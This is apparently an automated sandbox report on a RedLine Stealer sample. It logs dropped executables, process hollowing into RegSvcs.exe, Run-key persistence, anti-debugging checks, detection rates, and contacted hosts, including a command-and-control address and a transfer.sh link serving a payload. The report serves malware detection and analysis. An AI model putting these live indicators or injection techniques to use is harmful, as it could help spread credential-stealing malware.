Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\re.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A4E6A3 VirtualQuery,GetSystemInfo,

0_2_00A4E6A3

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00A3A69B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5B348 FindFirstFileExA,	0_2_00A5B348
Source: C:\Windows\Temp\123.exe	Code function: 1_2_00915FD4 FindFirstFileExW,	1_2_00915FD4

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

graph_0-19554

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A4F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00A4F838

Source: C:\Windows\Temp\123.exe

Code function: 1_2_00919791 GetProcessHeap,

1_2_00919791

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A57DEE mov eax, dword ptr fs:[00000030h]	0_2_00A57DEE
Source: C:\Windows\Temp\123.exe	Code function: 1_2_0091718B mov eax, dword ptr fs:[00000030h]	1_2_0091718B
Source: C:\Windows\Temp\123.exe	Code function: 1_2_0090CBAF mov eax, dword ptr fs:[00000030h]	1_2_0090CBAF
Source: C:\Windows\Temp\123.exe	Code function: 1_2_009587AC mov eax, dword ptr fs:[00000030h]	1_2_009587AC

Source: C:\Windows\Temp\123.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Temp\123.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Temp\321.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Temp\321.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Temp\123.exe

Code function: 1_2_00901CDA GetModuleHandleW,VirtualProtect,LdrInitializeThunk,

1_2_00901CDA

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A4F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A4F838
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A4FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00A4FBCA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A58EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A58EBD
Source: C:\Windows\Temp\123.exe	Code function: 1_2_009058FF SetUnhandledExceptionFilter,	1_2_009058FF
Source: C:\Windows\Temp\123.exe	Code function: 1_2_009098D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_009098D6
Source: C:\Windows\Temp\123.exe	Code function: 1_2_00905A15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00905A15
Source: C:\Windows\Temp\123.exe	Code function: 1_2_0090579D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0090579D

HIPS / PFW / Operating System Protection Evasion

Sample uses process hollowing technique

Source: C:\Windows\Temp\123.exe

Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\Temp\123.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 800000	Jump to behavior
Source: C:\Windows\Temp\123.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 666008	Jump to behavior
Source: C:\Windows\Temp\321.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\Temp\321.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 775008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\Temp\123.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 800000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\Temp\321.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\Temp\123.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 800000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\Temp\321.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Temp\123.exe

1_2_009587E1

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Temp\123.exe "C:\Windows\Temp\123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Temp\321.exe "C:\Windows\Temp\321.exe"	Jump to behavior
Source: C:\Windows\Temp\123.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\Temp\321.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	0_2_00A4AF0F
Source: C:\Windows\Temp\123.exe	Code function: GetLocaleInfoW,	1_2_00919234
Source: C:\Windows\Temp\123.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	1_2_00918BCE
Source: C:\Windows\Temp\123.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_0091935A
Source: C:\Windows\Temp\123.exe	Code function: GetLocaleInfoW,	1_2_0091037D
Source: C:\Windows\Temp\123.exe	Code function: GetLocaleInfoW,	1_2_00919460
Source: C:\Windows\Temp\123.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_0091952F
Source: C:\Windows\Temp\123.exe	Code function: EnumSystemLocalesW,	1_2_00918EBB
Source: C:\Windows\Temp\123.exe	Code function: EnumSystemLocalesW,	1_2_0090FE5B
Source: C:\Windows\Temp\123.exe	Code function: EnumSystemLocalesW,	1_2_00918E70
Source: C:\Windows\Temp\123.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_00918FE1
Source: C:\Windows\Temp\123.exe	Code function: EnumSystemLocalesW,	1_2_00918F56

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A4F654 cpuid

0_2_00A4F654

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A4FA4E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00A4FA4E

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A3B146 GetVersionExW,

0_2_00A3B146

Source: Report.wer.7.dr	Binary or memory string: UI[2]=C:\Windows\Temp\123.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: procexp.exe
Source: Report.wer.7.dr	Binary or memory string: LoadedModule[0]=C:\Windows\Temp\123.exe
Source: file.exe, 00000000.00000002.261160580.0000000004F61000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 123.exe, 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: C:\Windows\Temp\123.exe
Source: file.exe, 00000000.00000002.261160580.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ]wws\Temp\123.exe
Source: file.exe, 00000000.00000002.261160580.0000000004F61000.00000004.00000020.00020000.00000000.sdmp, WER5818.tmp.dmp.7.dr	Binary or memory string: 123.exe
Source: Amcache.hve.7.dr, Amcache.hve.LOG1.7.dr	Binary or memory string: c:\windows\temp\123.exe
Source: Report.wer.7.dr	Binary or memory string: AppPath=C:\Windows\Temp\123.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 3.2.RegSvcs.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.92ca60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.123.exe.1080000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.92ca60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.514026259.0000000000802000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.254290933.0000000001082000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 3.2.RegSvcs.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.92ca60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.123.exe.1080000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.92ca60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.514026259.0000000000802000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.254290933.0000000001082000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	11 Registry Run Keys / Startup Folder	511 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	511 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	31 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	4 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	25 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	30%	ReversingLabs	Win32.Trojan.Generic
file.exe	29%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Temp\123.exe	100%	Joe Sandbox ML
C:\Windows\Temp\321.exe	100%	Joe Sandbox ML
C:\Windows\Temp\123.exe	38%	ReversingLabs
C:\Windows\Temp\123.exe	39%	Virustotal		Browse
C:\Windows\Temp\321.exe	35%	ReversingLabs	Win32.Trojan.Generic
C:\Windows\Temp\321.exe	38%	Virustotal		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.3.123.exe.1080000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
2.2.321.exe.1280000.0.unpack	100%	Avira	TR/ATRAPS.Gen4	Download File
1.2.123.exe.900000.0.unpack	100%	Avira	TR/ATRAPS.Gen4	Download File
3.2.RegSvcs.exe.800000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
2.0.321.exe.1280000.0.unpack	100%	Avira	TR/ATRAPS.Gen4	Download File
1.0.123.exe.900000.0.unpack	100%	Avira	TR/ATRAPS.Gen4	Download File
8.2.RegSvcs.exe.3560984.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
51.210.161.21:36108	1%	Virustotal		Browse
https://api.ip.sb/ip	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
51.210.161.21:36108	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high
transfer.sh	144.76.136.153	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
51.210.161.21:36108	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/json/?fields=query,status,countryCode,city,timezone	false		high
http://transfer.sh/get/yAEPpl/gggge.exe	false		high
https://transfer.sh/get/yAEPpl/gggge.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	RegSvcs.exe, 00000008.00000002.519246544.00000000035E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.519934850.0000000003740000.00000004.00001000.00020000.00000000.sdmp, re.exe.8.dr	false	URL Reputation: safe	unknown
https://api.ip.sb/ip	123.exe, 123.exe, 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmp, RegSvcs.exe, 00000003.00000002.514026259.0000000000802000.00000020.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.7.dr	false		high
https://sectigo.com/CPS0	RegSvcs.exe, 00000008.00000002.519246544.00000000035E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.519934850.0000000003740000.00000004.00001000.00020000.00000000.sdmp, re.exe.8.dr	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	RegSvcs.exe, 00000008.00000002.519246544.00000000035E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.519934850.0000000003740000.00000004.00001000.00020000.00000000.sdmp, re.exe.8.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	RegSvcs.exe, 00000008.00000002.519246544.00000000035E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.519934850.0000000003740000.00000004.00001000.00020000.00000000.sdmp, re.exe.8.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
144.76.136.153	transfer.sh	Germany	24940	HETZNER-ASDE	false
84.252.73.140	unknown	Russian Federation	50113	SUPERSERVERSDATACENTERRU	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	834226
Start date and time:	2023-03-24 15:27:19 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@12/19@2/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 98.5% (good quality ratio 92.6%) Quality average: 79.7% Quality standard deviation: 28.5%
HCA Information:	Successful, ratio: 87% Number of executed functions: 93 Number of non-executed functions: 120
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 67.26.73.254, 8.238.85.254, 8.248.139.254, 8.248.147.254, 67.26.139.254, 20.42.65.92, 52.168.117.173, 104.208.16.94
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, wu-bg-shim.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:29:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
15:29:25	API Interceptor	3x Sleep call for process: WerFault.exe modified
15:29:41	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	prkHVeo4Bi.elf	Get hash	malicious	Unknown	Browse	ip-api.com/json
	Scan005.js	Get hash	malicious	MailPassView, WSHRAT	Browse	ip-api.com/json/
